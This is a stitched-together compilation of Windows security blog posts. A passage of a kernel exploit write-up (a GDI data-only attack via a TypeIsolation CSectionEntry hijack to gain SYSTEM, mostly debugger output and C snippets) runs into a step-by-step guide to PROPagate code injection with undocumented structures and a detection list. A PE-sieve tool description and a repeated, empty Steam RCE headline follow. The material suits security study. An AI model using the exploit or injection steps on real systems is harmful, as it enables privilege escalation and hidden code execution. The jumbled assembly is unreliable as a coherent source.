Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8```

0xffff862e827ca220 is a stable session paged pool hole, and 0xffff862e827ca220 will be released later, in a free state.


Kd> p

0033:00007ff7`abc21787 488b842498000000 mov rax,qword ptr [rsp+98h]

Kd> p

0033:00007ff7`abc2178f 48398424a0000000 cmp qword ptr [rsp+0A0h],rax

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Free ) *Ustx

Pooltag Ustx : USERTAG_TEXT, Binary : win32k!NtUserDrawCaptionTemp

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8

Ffff862e827ca330 size: e0 previous size: e0 (Allocated) Gla8

Now we need to create the CSecitionEntry to occupy 0xffff862e827ca220. This requires the use of a feature of TypeIsolation. As mentioned in the second section, when the GDI object is requested, it will traverse the CSectionEntry and determine whether there is any free in the view field, if the view field of the CSectionEntry is full, the traversal will continue to the next CSectionEntry, but if CTypeIsolation doubly linked list, all the view fields of the CSectionEntrys are full, then NSInstrumentation::CSectionEntry::Create is invoked to create a new CSectionEntry.

Therefore, we allocate a large number of GDI objects after we have finished creating the pool hole to fill up all the CSectionEntry’s view fields to ensure that a new CSectionEntry is created and occupy a pool hole of size 0x40.


Kd> g//create a large number of GDI objects, 0xffff862e827ca220 is occupied by CSectionEntry

Kd> !pool ffff862e827ca220

Pool page ffff862e827ca220 region is Unknown

Ffff862e827ca000 size: 150 previous size: 0 (Allocated) Gh04

Ffff862e827ca150 size: 10 previous size: 150 (Free) Free

Ffff862e827ca160 size: b0 previous size: 10 (Free) Uscu

*ffff862e827ca210 size: 40 previous size: b0 (Allocated) *Uiso

Pooltag Uiso : USERTAG_ISOHEAP, Binary : win32k!TypeIsolation::Create

Ffff862e827ca250 size: e0 previous size: 40 (Allocated) Gla8 ffff86b442563150 size:

Next we need to construct the fake CSectionEntry->view and fake CSectionEntry->bitmap_allocator and use the Arbitrary Write to modify the member-variable pointer in the CSectionEntry in the session paged pool hole to point to the fake struct we constructed.

The view field of the new CSectionEntry that was created when we allocate a large number of GDI objects may already be full or partially full by SURFACEs. If we construct the fake struct to construct the view field as empty, then we can deceive TypeIsolation that GDI object will place SURFACE in a known location.

We use VirtualAllocEx to allocate the memory in the userspace to store the fake struct, and we set the userspace memory property to READWRITE.


Kd> dq 1e0000//fake pushlock

00000000`001e0000 00000000`00000000 00000000`0000006c

Kd> dq 1f0000//fake view

00000000`001f0000 00000000`00000000 00000000`00000000

00000000`001f0010 00000000`00000000 00000000`00000000

Kd> dq 190000//fake RTL_BITMAP

00000000`00190000 00000000`000000f0 00000000`00190010

00000000`00190010 00000000`00000000 00000000`00000000

Kd> dq 1c0000//fake CSectionBitmapAllocator

00000000`001c0000 00000000`001e0000 deadbeef`deb2b33f

00000000`001c0010 deadbeef`deadb33f deadbeef`deb4b33f

00000000`001c0020 00000001`00000001 00000001`00000000

Among them, 0x1f0000 points to the view field, 0x1c0000 points to CSectionBitmapAllocator, and the fake view field is used to store the GDI object. The structure of CSectionBitmapAllocator needs thoughtful construction because we need to use it to deceive the typeisolation that the CSectionEntry we control is a free view item.


Typedef struct _CSECTIONBITMAPALLOCATOR {

PVOID pushlock; // + 0x00

ULONG64 xored_view; // + 0x08

ULONG64 xor_key; // + 0x10

ULONG64 xored_rtl_bitmap; // + 0x18

ULONG bitmap_hint_index; // + 0x20

ULONG num_commited_views; // + 0x24

} CSECTIONBITMAPALLOCATOR, *PCSECTIONBITMAPALLOCATOR;

The above CSectionBitmapAllocator structure compares with 0x1c0000 structure, and I defined xor_key as 0xdeadbeefdeadb33f, as long as the xor_key ^ xor_view and xor_key ^ xor_rtl_bitmap operation point to the view field and RTL_BITMAP. In the debugging I found that the pushlock must point to a valid structure pointer, otherwise it will trigger BUGCHECK, so I allocate memory 0x1e0000 to store pushlock content.

As described in the second section, bitmap_hint_index is used as a condition to quickly index in the RTL_BITMAP, so this value also needs to be set to 0x00 to indicate the index in RTL_BITMAP. In the same way we look at the structure of RTL_BITMAP.


Typedef struct _RTL_BITMAP {

ULONG64 size; // + 0x00

PVOID bitmap_buffer; // + 0x08

} RTL_BITMAP, *PRTL_BITMAP;

Kd> dyb fffff322401b90b0

76543210 76543210 76543210 76543210

-------- -------- -------- --------

Fffff322`401b90b0 11110000 00000000 00000000 00000000 f0 00 00 00

Fffff322`401b90b4 00000000 00000000 00000000 00000000 00 00 00 00

Fffff322`401b90b8 11000000 10010000 00011011 01000000 c0 90 1b 40

Fffff322`401b90bc 00100010 11110011 11111111 11111111 22 f3 ff ff

Fffff322`401b90c0 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c4 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90c8 11111111 11111111 11111111 11111111 ff ff ff ff

Fffff322`401b90cc 11111111 11111111 11111111 11111111 ff ff ff ff

Kd> dq fffff322401b90b0

Fffff322`401b90b0 00000000`000000f0 fffff322`401b90c0//ptr to rtl_bitmap buffer

Fffff322`401b90c0 ffffffff`ffffffff ffffffff`ffffffff

Fffff322`401b90d0 ffffffff`ffffffff

Here I select a valid RTL_BITMAP as a template, where the first member-variable represents the RTL_BITMAP size, the second member-variable points to the bitmap_buffer, and the immediately adjacent bitmap_buffer represents the state of the view field in bits. To deceive typeisolation, we will all of them are set to 0, indicating that the view field of the current CSectionEntry item is all idle, referring to the 0x190000 fake RTL_BITMAP structure.

Next, we only need to modify the CSectionEntry view and CSectionBitmapAllocator pointer through the HEVD’s Arbitrary write vulnerability.


Kd> dq ffff862e827ca220//before trigger

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 ffff862e`84780000

Ffff862e`827ca240 ffff862e`827f33c0 00000000`00000000

Kd> g / / trigger vulnerability, CSectionEntry-> view and CSectionEntry-> bitmap_allocator is modified

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21e35 cc int 3

Kd> dq ffff862e827ca220

Ffff862e`827ca220 ffff862e`827cf4f0 ffff862e`827ef300

Ffff862e`827ca230 ffffc383`08613880 00000000`001f0000

Ffff862e`827ca240 00000000`001c0000 00000000`00000000

Next, we normally allocate a GDI object, call CreateBitmap to create a bitmap object, and then observe the state of the view field.


Kd> g

Break instruction exception - code 80000003 (first chance)

0033:00007ff7`abc21ec8 cc int 3

Kd> dq 1f0280

00000000`001f0280 00000000`00051a2e 00000000`00000000

00000000`001f0290 ffffd40a`cc9fd700 00000000`00000000

00000000`001f02a0 00000000`00051a2e 00000000`00000000

00000000`001f02b0 00000000`00000000 00000002`00000040

00000000`001f02c0 00000000`00000080 ffff862e`8277da30

00000000`001f02d0 ffff862e`8277da30 00003f02`00000040

00000000`001f02e0 00010000`00000003 00000000`00000000

00000000`001f02f0 00000000`04800200 00000000`00000000

You can see that the bitmap kernel object is placed in the fake view field. We can read the bitmap kernel object directly from the userspace. Next, we only need to directly modify the pvScan0 of the bitmap kernel object stored in the userspace, and then call the GetBitmapBits/SetBitmapBits to complete any memory address read and write.

Summarize the exploit process:

Fix for full exploit:

In the course of completing the exploit, I discovered that BSOD was generated some time, which greatly reduced the stability of the GDI data-only attack. For example,


Kd> !analyze -v

************************************************** *****************************

* *

* Bugcheck Analysis *

* *

************************************************** *****************************




SYSTEM_SERVICE_EXCEPTION (3b)

An exception happened while performing a system service routine.

Arguments:

Arg1: 00000000c0000005, Exception code that caused the bugcheck

Arg2: ffffd7d895bd9847, Address of the instruction which caused the bugcheck

Arg3: ffff8c8f89e98cf0, Address of the context record for the exception that caused the bugcheck

Arg4: 0000000000000000, zero.




Debugging Details:

------------------







OVERLAPPED_MODULE: Address regions for 'dxgmms1' and 'dump_storport.sys' overlap




EXCEPTION_CODE: (NTSTATUS) 0xc0000005 - 0x%08lx




FAULTING_IP:

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+47

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi]




CONTEXT: ffff8c8f89e98cf0 -- (.cxr 0xffff8c8f89e98cf0)

.cxr 0xffff8c8f89e98cf0

Rax=ffffdb0039e7c080 rbx=ffffd7a7424e4e00 rcx=ffffdb0039e7c080

Rdx=ffffd7a7424e4e00 rsi=00000000001e0000 rdi=ffffd7a740000660

Rip=ffffd7d895bd9847 rsp=ffff8c8f89e996e0 rbp=0000000000000000

R8=ffff8c8f89e996b8 r9=0000000000000001 r10=7ffffffffffffffc

R11=0000000000000027 r12=00000000000000ea r13=ffffd7a740000680

R14=ffffd7a7424dca70 r15=0000000000000027

Iopl=0 nv up ei pl nz na po nc

Cs=0010 ss=0018 ds=002b es=002b fs=0053 gs=002b efl=00010206

Win32kbase!NSInstrumentation::CTypeIsolation&lt;163840,640>::AllocateType+0x47:

Ffffd7d8`95bd9847 488b1e mov rbx, qword ptr [rsi] ds:002b:00000000`001e0000=????????????????

After many tracking, I discovered that the main reason for BSOD is that the fake struct we created when using VirtualAllocEx is located in the process space of our current process. This space is not shared by other processes, that is, if we modify the view field through a vulnerability. After the pointer to the CSectionBitmapAllocator, when other processes create the GDI object, it will also traverse the CSecitionEntry. When traversing to the CSectionEntry we modify through the vulnerability, it will generate BSoD because the address space of the process is invalid, so here I did my first fix when the vulnerability was triggered finish.


DWORD64 fix_bitmapbits1 = 0xffffffffffffffff;

DWORD64 fix_bitmapbits2 = 0xffffffffffff;

DWORD64 fix_number = 0x2800000000;

CopyMemory((void *)(fakertl_bitmap + 0x10), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x18), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x20), &fix_bitmapbits1, 0x8);

CopyMemory((void *)(fakertl_bitmap + 0x28), &fix_bitmapbits2, 0x8);

CopyMemory((void *)(fakeallocator + 0x20), &fix_number, 0x8);

In the first fix, I modified the bitmap_hint_index and the rtl_bitmap to deceive the typeisolation when traverse the CSectionEntry and think that the view field of the fake CSectionEntry is currently full and will skip this CSectionEntry.

We know that the current CSectionEntry has been modified by us, so even if we end the exploit exit process, the CSectionEntry will still be part of the CTypeIsolation doubly linked list, and when our process exits, The current process space allocated by VirtualAllocEx will be released. This will lead to a lot of unknown errors. We have already had the ability to read and write at any address. So I did my second fix.


ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryRead(bitmap, fakeview + 0x280 + 0x48, CSectionEntryKernelAddress, (BYTE *)&CSectionNext, sizeof(DWORD64));

LogMessage(L_INFO, L"Current CSectionEntry->previous: 0x%p", CSePrevious);

LogMessage(L_INFO, L"Current CSectionEntry->next: 0x%p", CSectionNext);

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionNext + 0x8, (BYTE *)&CSectionPrevious, sizeof(DWORD64));

ArbitraryWrite(bitmap, fakeview + 0x280 + 0x48, CSectionPrevious, (BYTE *)&CSectionNext, sizeof(DWORD64));

In the second fix, I obtained CSectionEntry->previous and CSectionEntry->next, which unlinks the current CSectionEntry so that when the GDI object allocates traversal CSectionEntry, it will  deal with fake CSectionEntry no longer.

After completing the two fixes, you can successfully use GDI data-only attack to complete any memory address read and write. Here, I directly obtained the SYSTEM permissions for the latest version of Windows10 rs3, but once again when the process completely exits, it triggers BSoD. After the analysis, I found that this BSoD is due to the unlink after, the GDI handle is still stored in the GDI handle table, then it will find the corresponding kernel object in CSectionEntry and free away, and we store the bitmap kernel object CSectionEntry has been unlink, Caused the occurrence of BSoD.

The problem occurs in NtGdiCloseProcess, which is responsible for releasing the GDI object of the current process. The call chain associated with SURFACE is as follows


0e ffff858c`8ef77300 ffff842e`52a57244 win32kbase!SURFACE::bDeleteSurface+0x7ef

0f ffff858c`8ef774d0 ffff842e`52a1303f win32kbase!SURFREF::bDeleteSurface+0x14

10 ffff858c`8ef77500 ffff842e`52a0cbef win32kbase!vCleanupSurfaces+0x87

11 ffff858c`8ef77530 ffff842e`52a0c804 win32kbase!NtGdiCloseProcess+0x11f

bDeleteSurface is responsible for releasing the SURFACE kernel object in the GDI handle table. We need to find the HBITMAP which stored in the fake view in the GDI handle table, and set it to 0x0. This will skip the subsequent free processing in bDeleteSurface. Then call HmgNextOwned to release the next GDI object. The key code for finding the location of HBITMAP in the GDI handle table is in HmgSharedLockCheck. The key code is as follows:


V4 = *(_QWORD *)(*(_QWORD *)(**(_QWORD **)(v10 + 24) + 8 *((unsigned __int64)(unsigned int)v6 >> 8)) + 16i64 * (unsigned __int8 )v6 + 8);

Here I have restored a complete calculation method to find the bitmap object:


*(*(*(*(*win32kbase!gpHandleManager+10)+8)+18)+(hbitmap&0xffff>>8)*8)+hbitmap&0xff*2*8

It is worth mentioning here is the need to leak the base address of win32kbase.sys, in the case of Low IL, we need vulnerability to leak info. And I use NtQuerySystemInformation in Medium IL to leak win32kbase.sys base address to calculate the gpHandleManager address, after Find the position of the target bitmap object in the GDI handle table in the fake view, and set it to 0x0. Finally complete the full exploit.

Now that the exploit of the kernel is getting harder and harder, a full exploitation often requires the support of other vulnerabilities, such as the info leak. Compared to the oob writes, uaf, double free, and write-what-where, the pool overflow is more complicated with this scenario, because it involves CSectionEntry->previous and CSectionEntry->next problems, but it is not impossible to use this scenario in pool overflow.

If you have any questions, welcome to discuss with me. Thank you!

5 Reference

https://www.coresecurity.com/blog/abusing-gdi-for-ring0-exploit-primitives

https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/5A1F/DEFCON-25-5A1F-Demystifying-Kernel-Exploitation-By-Abusing-GDI-Objects.pdf

https://blog.quarkslab.com/reverse-engineering-the-win32k-type-isolation-mitigation.html

https://github.com/sam-b/windows_kernel_address_leaks

New code injection trick named — PROPagate code injection technique

ROPagate code injection technique

@Hexacorn discussed in late 2017 a new code injection technique, which involves hooking existing callback functions in a Window subclass structure. Exploiting this legitimate functionality of windows for malicious purposes will not likely surprise some developers already familiar with hooking existing callback functions in a process. However, it’s still a relatively new technique for many to misuse for code injection, and we’ll likely see it used more and more in future.

For all the details on research conducted by Adam, I suggest the following posts.

 

PROPagate — a new code injection trick

|=======================================================|

Executing code inside a different process space is typically achieved via an injected DLL /system-wide hooks, sideloading, etc./, executing remote threads, APCs, intercepting and modifying the thread context of remote threads, etc. Then there is Gapz/Powerloader code injection (a.k.a. EWMI), AtomBombing, and mapping/unmapping trick with the NtClose patch.

There is one more.

Remember Shatter attacks?

I believe that Gapz trick was created as an attempt to bypass what has been mitigated by the User Interface Privilege Isolation (UIPI). Interestingly, there is actually more than one way to do it, and the trick that I am going to describe below is a much cleaner variant of it – it doesn’t even need any ROP.

There is a class of windows always present on the system that use window subclassing. Window subclassing is just a fancy name for hooking, because during the subclassing process an old window procedure is preserved while the new one is being assigned to the window. The new one then intercepts all the window messages, does whatever it has to do, and then calls the old one.

The ‘native’ window subclassing is done using the SetWindowSubclass API.

When a window is subclassed it gains a new property stored inside its internal structures and with a name depending on a version of comctl32.dll:

  • UxSubclassInfo – version 6.x
  • CC32SubclassInfo – version 5.x

Looking at properties of Windows Explorer child windows we can see that plenty of them use this particular subclassing property:

So do other Windows applications – pretty much any program that is leveraging standard windows controls can be of interest, including say… OllyDbg:When the SetWindowSubclass is called it is using SetProp API to set one of these two properties (UxSubclassInfo, or CC32SubclassInfo) to point to an area in memory where the old function pointer will be stored. When the new message routine is called, it will then call GetProp API for the given window and once its old procedure address is retrieved – it is executed.

Coming back for a moment to the aforementioned shattering attacks. We can’t use SetWindowLong or SetClassLong (or their newer SetWindowLongPtr and SetClassLongPtr alternatives) any longer to set the address of the window procedure for windows belonging to the other processes (via GWL_WNDPROC or GCL_WNDPROC). However, the SetProp function is not affected by this limitation. When it comes to the process at the lower of equal  integrity level the Microsoft documentation says:

SetProp is subject to the restrictions of User Interface Privilege Isolation (UIPI). A process can only call this function on a window belonging to a process of lesser or equal integrity level. When UIPI blocks property changes, GetLastError will return 5.

So, if we talk about other user applications in the same session – there is plenty of them and we can modify their windows’ properties freely!

I guess you know by now where it is heading:

  • We can freely modify the property of a window belonging to another process.
  • We also know some properties point to memory region that store an old address of a procedure of the subclassed window.
  • The routine that address points to will be at some stage executed.

All we need is a structure that UxSubclassInfo/CC32SubclassInfo properties are using. This is actually pretty easy – you can check what SetProp is doing for these subclassed windows. You will quickly realize that the old procedure is stored at the offset 0x14 from the beginning of that memory region (the structure is a bit more complex as it may contain a number of callbacks, but the first one is at 0x14).

So, injecting a small buffer into a target process, ensuring the expected structure is properly filled-in and and pointing to the payload and then changing the respective window property will ensure the payload is executed next time the message is received by the window (this can be enforced by sending a message).

When I discovered it, I wrote a quick & dirty POC that enumerates all windows with the aforementioned properties (there is lots of them so pretty much every GUI application is affected). For each subclassing property found I changed it to a random value – as a result Windows Explorer, Total Commander, Process Hacker, Ollydbg, and a few more applications crashed immediately. That was a good sign. I then created a very small shellcode that shows a Message Box on a desktop window and tested it on Windows 10 (under normal account).

The moment when the shellcode is being called in a first random target (here, Total Commander):

Of course, it also works in Windows Explorer, this is how it looks like when executed:


If we check with Process Explorer, we can see the window belongs to explorer.exe:Testing it on a good ol’ Windows XP and injecting the shellcode into Windows Explorer shows a nice cascade of executed shellcodes for each window exposing the subclassing property (in terms of special effects XP always beats Windows 10 – the latter freezes after first messagebox shows up; and in case you are wondering why it freezes – it’s because my shellcode is simple and once executed it is basically damaging the running application):

For obvious reasons I won’t be attaching the source code.

If you are an EDR or sandboxing vendor you should consider monitoring SetProp/SetWindowSubclass APIs as well as their NT alternatives and system services.

And…

This is not the end. There are many other generic properties that can be potentially leveraged in a very same way:

  • The Microsoft Foundation Class Library (MFC) uses ‘AfxOldWndProc423’ property to subclass its windows
  • ControlOfs[HEX] – properties associated with Delphi applications reference in-memory Visual Component Library (VCL) objects
  • New windows framework e.g. Microsoft.Windows.WindowFactory.* needs more research
  • A number of custom controls use ‘subclass’ and I bet they can be modified in a similar way
  • Some properties expose COM/OLE Interfaces e.g. OleDropTargetInterface

If you are curious if it works between 32- and 64- bit processes

|=======================================================|

 

PROPagate follow-up — Some more Shattering Attack Potentials

|=======================================================|

We now know that one can use SetProp to execute a shellcode inside 32- and 64-bit applications as long as they use windows that are subclassed.

=========================================================

A new trick that allows to execute code in other processes without using remote threads, APC, etc. While describing it, I focused only on 32-bit architecture. One may wonder whether there is a way for it to work on 64-bit systems and even more interestingly – whether there is a possibility to inject/run code between 32- and 64- bit processes.

To test it, I checked my 32-bit code injector on a 64-bit box. It crashed my 64-bit Explorer.exe process in no time.

So, yes, we can change properties of windows belonging to 64-bit processes from a 32-bit process! And yes, you can swap the subclass properties I described previously to point to your injected buffer and eventually make the payload execute! The reason it works is that original property addresses are stored in lower 32-bit of the 64-bit offset. Replacing that lower 32-bit part of the offset to point to a newly allocated buffer (also in lower area of the memory, thanks to VirtualAllocEx) is enough to trigger the code execution.

See below the GetProp inside explorer.exe retrieving the subclassed property:

So, there you have it… 32 process injecting into 64-bit process and executing the payload w/o heaven’s gate or using other undocumented tricks.

The below is the moment the 64-bit shellcode is executed:

p.s. the structure of the subclassed callbacks is slightly different inside 64-bit processes due to 64-bit offsets, but again, I don’t want to make it any easier to bad guys than it should be 🙂

=========================================================

There are more possibilities.

While SetWindowLong/SetWindowLongPtr/SetClassLong/SetClassLongPtr are all protected and can be only used on windows belonging to the same process, the very old APIs SetWindowWord and SetClassWord … are not.

As usual, I tested it enumerating windows running a 32-bit application on a 64-bit system and setting properties to unpredictable values and observing what happens.

It turns out that again, pretty much all my Window applications crashed on Window 10. These 16 bits seem to be quite powerful…

I am not a vulnerability researcher, but I bet we can still do something interesting; I will continue poking around. The easy wins I see are similar to SetProp e.g. GWL_USERDATA may point to some virtual tables/pointers; the DWL_USER – as per Microsoft – ‘sets new extra information that is private to the application, such as handles or pointers’. Assuming that we may only modify 16 bit of e.g. some offset, redirecting it to some code cave or overwriting unused part of memory within close proximity of the original offset could allow for a successful exploit.

|=======================================================|

 

PROPagate follow-up #2 — Some more Shattering Attack Potentials

|=======================================================|

A few months back I discovered a new code injection technique that I named PROPagate. Using a subclass of a well-known shatter attack one can modify the callback function pointers inside other processes by using Windows APIs like SetProp, and potentially others. After pointing out a few ideas I put it on a back burner for a while, but I knew I will want to explore some more possibilities in the future.

In particular, I was curious what are the chances one could force the remote process to indirectly call the ‘prohibited’ functions like SetWindowLong, SetClassLong (or their newer alternatives SetWindowLongPtr and SetClassLongPtr), but with the arguments that we control (i.e. from a remote process). These API are ‘prohibited’ because they can only be called in a context of a process that owns them, so we can’t directly call them and target windows that belong to other processes.

It turns out his may be possible!

If there is one common way of using the SetWindowLong API it is to set up pointers, and/or filling-in window-specific memory areas (allocated per window instance) with some values that are initialized immediately after the window is created. The same thing happens when the window is destroyed – during the latter these memory areas are usually freed and set to zeroes, and callbacks are discarded.

These two actions are associated with two very specific window messages:

  • WM_NCCREATE
  • WM_NCDESTROY

In fact, many ‘native’ windows kick off their existence by setting some callbacks in their message handling routines during processing of these two messages.

With that in mind, I started looking at existing processes and got some interesting findings. Here is a snippet of a routine I found inside Windows Explorer that could be potentially abused by a remote process:

Or, it’s disassembly equivalent (in response to WM_NCCREATE message):

So… since we can still freely send messages between windows it would seem that there is a lot of things that can be done here. One could send a specially crafted WM_NCCREATE message to a window that owns this routine and achieve a controlled code execution inside another process (the lParam needs to pass the checks and include pointer to memory area that includes a callback that will be executed afterwards – this callback could point to malicious code). I may be of course wrong, but need to explore it further when I find more time.

The other interesting thing I noticed is that some existing windows procedures are already written in a way that makes it harder to exploit this issue. They check if the window-specific data was set, and only if it was NOT they allow to call the SetWindowLong function. That is, they avoid executing the same initialization code twice.

|=======================================================|

 

No Proof of Concept?

Let’s be honest with ourselves, most of the “good” code injection techniques used by malware authors today are the brainchild of some expert(s) in the field of computer security. Take for example Process HollowingAtomBombing and the more recent Doppelganging technique.

On the likelihood of code being misused, Adam didn’t publish a PoC, but there’s still sufficient information available in the blog posts for a competent person to write their own proof of concept, and it’s only a matter of time before it’s used in the wild anyway.

Update: After publishing this, I discovered it’s currently being used by SmokeLoader but using a different approach to mine by using SetPropA/SetPropW to update the subclass procedure.

I’m not providing source code here either, but given the level of detail, it should be relatively easy to implement your own.

Steps to PROPagate.

  1. Enumerate all window handles and the properties associated with them using EnumProps/EnumPropsEx
  2. Use GetProp API to retrieve information about hWnd parameter passed to WinPropProc callback function. Use “UxSubclassInfo” or “CC32SubclassInfo” as the 2nd parameter.
    The first class is for systems since XP while the latter is for Windows 2000.
  3. Open the process that owns the subclass and read the structures that contain callback functions. Use GetWindowThreadProcessId to obtain process id for window handle.
  4. Write a payload into the remote process using the usual methods.
  5. Replace the subclass procedure with pointer to payload in memory.
  6. Write the structures back to remote process.

At this point, we can wait for user to trigger payload when they activate the process window, or trigger the payload via another API.

Subclass callback and structures

Microsoft was kind enough to document the subclass procedure, but unfortunately not the internal structures used to store information about a subclass, so you won’t find them on MSDN or even in sources for WINE or ReactOS.

typedef LRESULT (CALLBACK *SUBCLASSPROC)(
   HWND      hWnd,
   UINT      uMsg,
   WPARAM    wParam,
   LPARAM    lParam,
   UINT_PTR  uIdSubclass,
   DWORD_PTR dwRefData);

Some clever searching by yours truly eventually led to the Windows 2000 source code, which was leaked online in 2004. Behold, the elusive undocumented structures found in subclass.c!

typedef struct _SUBCLASS_CALL {
  SUBCLASSPROC pfnSubclass;    // subclass procedure
  WPARAM       uIdSubclass;    // unique subclass identifier
  DWORD_PTR    dwRefData;      // optional ref data
} SUBCLASS_CALL, *PSUBCLASS_CALL;
typedef struct _SUBCLASS_FRAME {
  UINT    uCallIndex;   // index of next callback to call
  UINT    uDeepestCall; // deepest uCallIndex on stack
// previous subclass frame pointer
  struct _SUBCLASS_FRAME  *pFramePrev;
// header associated with this frame 
  struct _SUBCLASS_HEADER *pHeader;     
} SUBCLASS_FRAME, *PSUBCLASS_FRAME;
typedef struct _SUBCLASS_HEADER {
  UINT           uRefs;        // subclass count
  UINT           uAlloc;       // allocated subclass call nodes
  UINT           uCleanup;     // index of call node to clean up
  DWORD          dwThreadId; // thread id of window we are hooking
  SUBCLASS_FRAME *pFrameCur;   // current subclass frame pointer
  SUBCLASS_CALL  CallArray[1]; // base of packed call node array
} SUBCLASS_HEADER, *PSUBCLASS_HEADER;

At least now there’s no need to reverse engineer how Windows stores information about subclasses. Phew!

Finding suitable targets

I wrongly assumed many processes would be vulnerable to this injection method. I can confirm ollydbg and Process Hacker to be vulnerable as Adam mentions in his post, but I did not test other applications. As it happens, only explorer.exe seemed to be a viable target on a plain Windows 7 installation. Rather than search for an arbitrary process that contained a subclass callback, I decided for the purpose of demonstrations just to stick with explorer.exe.

The code first enumerates all properties for windows created by explorer.exe. An attempt is made to request information about “UxSubclassInfo”, which if successful will return an address pointer to subclass information in the remote process.

Figure 1. shows a list of subclasses associated with process id. I’m as perplexed as you might be about the fact some of these subclass addresses appear multiple times. I didn’t investigate.

Figure 1: Address of subclass information and process id for explorer.exe

Attaching a debugger to process id 5924 or explorer.exe and dumping the first address provides the SUBCLASS_HEADER contents. Figure 2 shows the data for header, with 2 hi-lighted values representing the callback functions.

Figure 2 : Dump of SUBCLASS_HEADER for address 0x003A1BE8

Disassembly of the pointer 0x7448F439 shows in Figure 3 the code is CallOriginalWndProc located in comctl32.dll

Figure 3 : Disassembly of callback function for SUBCLASS_CALL

Okay! So now we just read at least one subclass structure from a target process, change the callback address, and wait for explorer.exe to execute the payload. On the other hand, we could write our own SUBCLASS_HEADER to remote memory and update the existing subclass window with SetProp API.

To overwrite SUBCLASS_HEADER, all that’s required is to replace the pointer pfnSubclass with address of payload, and write the structure back to memory. Triggering it may be required unless someone is already using the operating system.

One would be wise to restore the original callback pointer in subclass header after payload has executed, in order to avoid explorer.exe crashing.

Update: Smoke Loader probably initializes its own SUBCLASS_HEADER before writing to remote process. I think either way is probably fine. The method I used didn’t call SetProp API.

Detection

The original author may have additional information on how to detect this injection method, however I think the following strings and API are likely sufficient to merit closer investigation of code.

Strings

  • UxSubclassInfo
  • CC32SubclassInfo
  • explorer.exe

API

  • OpenProcess
  • ReadProcessMemory
  • WriteProcessMemory
  • GetPropA/GetPropW
  • SetPropA/SetPropW

Conclusion

This injection method is trivial to implement, and because it affects many versions of Windows, I was surprised nobody published code to show how it worked. Nevertheless, it really is just a case of hooking callback functions in a remote process, and there are many more just like subclass. More to follow!

PE-sieve — Hook Finder is open source tool based on libpeconv.

PE-sieve (previously known as Hook Finder) is open source tool based on libpeconv.
It scans a given process, searching for manually loaded or modified modules. When found, it dumps the modified/suspicious PE along with a report in JSON format, detailing about the found indicators.
Currently it detects inline hooks, hollowed processes, Process Doppelgänging, injected PE files etc. In case if the PE file was patched in the memory, it gives a detailed report about where are the changed bytes (and few other properties).

The tool is under rapid development, so expect frequent updates.

PE-sieve is available in 2 versions – as standalone executable, and as a DLL. The DLL version became a base of my other project: HollowsHunter – that makes an automated scan of all the running processes. More about it in the further part of the post.

Where to get it?

The tool is open-source, available on my github:

  https://github.com/hasherezade/pe-sieve

Usage

It has a simple, commandline interface. When run without parameters, it displays info about the version and required arguments:

When you run it giving a PID of the running process, it scans all the PE modules in its memory (the main executable, but also all the loaded DLLs). At the end, you can see the summary of how many anomalies have been detected of which type.

In case if some modified modules has been detected, they are dumped to a folder of a given process, for example:

Short history & features

Detecting inline hooks and patches

I started creating it for the purpose of searching and examining inline hooks. You can see it in action here (old version):

It not only detects that there IS an anomaly/patch, but also WHERE exactly it is. For each dumped PE where the patches were found, it creates a file with tags, that can be loaded by PE-bear.

Thanks to this, we can easily browse the found hooks and check the code that was overwritten.

For example – in the application presented above, the Entry Point was patched and the execution was redirected to the added, malicious section:

Detecting hollowed processes

Later, I extended it to detect process hollowing etc – and it turned out to be pretty convenient unpacker:

Detecting Process Doppelgänging

In a similar manner, it can detects some other methods of impersonating a processes, for example Process Doppelgänging. The malicious payload is directly dumped and ready to be analyzed:

Recovering erased imports

PE-sieve has an ability to recover erased imports. In order to enable it, deploy it with appropriate option. Example – unpacking manually loaded payloads with imports erased (Emotet):

Future development

The project is still not finished and I have many ideas how to make it better. I am planning to detect not only code modifications, but also other types of hooking, such as IAT and EAT patching.

Some in-memory patches are done by legitimate applications, so, in the future version I will provide capability of whitelisting defined patches.

I am also planning to extend its dumping capabilities against the malicious processes that are trying to defend themselves against dumpers etc.

PE-sieve as a DLL

During the development process I got an idea to make a DLL version of the PE-sieve, so that it can be incorporated in other projects.

Building PE-sieve from sources as a DLL is very easy – you just need to set one CMake option: PE_SIEVE_AS_DLL:

build_as_dll

The PE-sieve DLL exposes a minimalistic API. Two functions are exported:

pe-sieve_func

  1. PESieve_help – displays a short info and the version of the DLL.
  2. PESieve_scan – a typical scan with a given parameters, like in the PE-Sieve.exe

The necessary headers needs to be included from the folder “pe-sieve\include“:

https://github.com/hasherezade/pe-sieve/tree/master/include

I have plans to enrich the API in the future. For now, you can see the PE-sieve DLL in action in the HollowsHunter project.

Ideas? Bugs?

If you noticed bug or have an idea for a useful feature, don’t hesitate to mail me or create a Github issue – I check them regularly:

https://github.com/hasherezade/pe-sieve/issues

Remote Code Execution Vulnerability in the Steam Client

Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

Frag Grenade! A Remote Code Execution Vulnerability in the Steam Client

